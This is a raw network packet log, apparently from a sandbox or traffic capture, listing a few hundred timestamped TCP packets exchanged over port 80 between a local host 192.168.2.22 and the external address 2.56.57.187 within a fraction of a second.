Dec 15, 2021 14:47:52.274061918 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274074078 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274113894 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274116039 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274153948 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274153948 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274194002 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274194002 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274234056 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274234056 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274272919 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274274111 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274316072 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274317026 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274357080 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274363041 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274396896 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274436951 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274458885 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274463892 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274468899 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274475098 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274512053 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274514914 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274554968 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274554968 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274595976 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274622917 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274636030 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274641991 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274676085 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274677992 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274714947 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274739027 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274785995 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274787903 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274822950 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274823904 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274861097 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274863005 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274902105 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274902105 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274940968 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274979115 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.274985075 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.274991989 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.275017977 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.275027037 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.275055885 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.275058985 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.275100946 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.275101900 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.275144100 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.275381088 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.300525904 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.300585985 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.300626993 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.300642967 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.300664902 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.300681114 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.300687075 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.300707102 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.300714016 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.300749063 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.300765038 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.300790071 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.300812006 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.300844908 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.300858974 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.300918102 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.300920010 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.300956964 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.300970078 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.300996065 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.301003933 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.301035881 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.301044941 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.301074982 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.301083088 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.301115990 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.301125050 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.301165104 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.301381111 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302027941 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302071095 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302110910 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302117109 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302128077 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302149057 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302165985 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302189112 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302197933 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302227974 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302237988 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302268028 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302282095 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302309990 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302316904 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302350998 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302361012 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302401066 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302412033 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302442074 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302443027 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302475929 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302479029 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302494049 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302520037 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302520990 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302561045 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302575111 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302598953 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302604914 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302639008 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302651882 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302687883 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302694082 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302726984 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.302752972 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302768946 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.302980900 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.326786995 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.326844931 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.326875925 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.326884031 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.326905966 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.326920033 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.326925039 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.326962948 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.326967001 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.327002048 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.327002048 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.327043056 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.327043056 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.327090979 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.327092886 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.327130079 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.327132940 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.327168941 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.327171087 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.327205896 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.327208996 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.327244997 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.327245951 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.327285051 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.327286959 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.327323914 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.327323914 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.327363968 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.327364922 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.327400923 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.327404976 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.327447891 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.327769041 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.327976942 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328018904 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328032970 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328056097 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328058004 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328094959 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328095913 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328136921 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328136921 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328175068 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328176975 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328213930 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328214884 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328262091 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328295946 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328299999 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328304052 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328341007 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328341961 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328380108 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328382969 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328418970 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328419924 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328459024 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328459978 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328497887 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328500986 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328536987 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328537941 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328576088 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328584909 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328615904 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328629017 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328655958 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328659058 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328694105 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328696012 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328735113 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.328737020 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.328779936 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.330338001 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.352910042 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.352933884 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.352946043 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.352967978 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.352984905 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.353007078 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.353018045 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.353034019 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.353049994 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.353049994 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.353056908 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.353061914 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.353065968 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.353069067 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.353071928 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.353081942 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.353097916 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.353101015 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.353113890 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.353116989 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.353128910 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.353130102 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.353147984 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.353161097 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.353164911 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.353169918 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.353182077 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.353185892 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.353199005 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.353202105 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.353215933 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.353219032 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.353235006 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.353246927 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354413986 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354439974 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354455948 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354471922 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354487896 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354502916 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354518890 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354533911 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354552984 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354552031 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354568005 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354585886 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354587078 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354593039 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354598045 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354602098 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354605913 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354609013 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354614019 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354618073 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354621887 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354626894 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354628086 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354631901 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354645014 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354660988 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354676962 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354674101 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354688883 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354693890 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354693890 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354708910 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354712963 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354729891 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354746103 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354747057 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354753017 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354762077 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354763985 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354778051 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.354779959 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354794979 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.354809046 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.378853083 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.378879070 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.378895998 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.378911972 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.378927946 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.378943920 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.378962994 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.378964901 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.378978968 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.378997087 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.379009008 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379014015 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.379015923 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379021883 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379025936 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379030943 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379031897 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.379035950 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379040956 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379045010 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379050016 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.379065990 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.379066944 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379079103 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379082918 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.379098892 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379100084 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.379116058 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.379122972 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379132986 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.379133940 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379151106 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.379153013 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379167080 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.379183054 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.379194021 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379206896 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379213095 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379220009 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.379645109 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380042076 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380105019 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380239010 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380255938 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380273104 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380290031 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380292892 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380305052 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380306005 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380311966 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380323887 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380326986 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380341053 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380342007 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380358934 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380361080 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380374908 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380373955 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380393982 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380400896 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380410910 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380415916 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380424023 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380428076 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380439043 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380445004 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380460978 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380476952 CET	80	49165	2.56.57.187	192.168.2.22
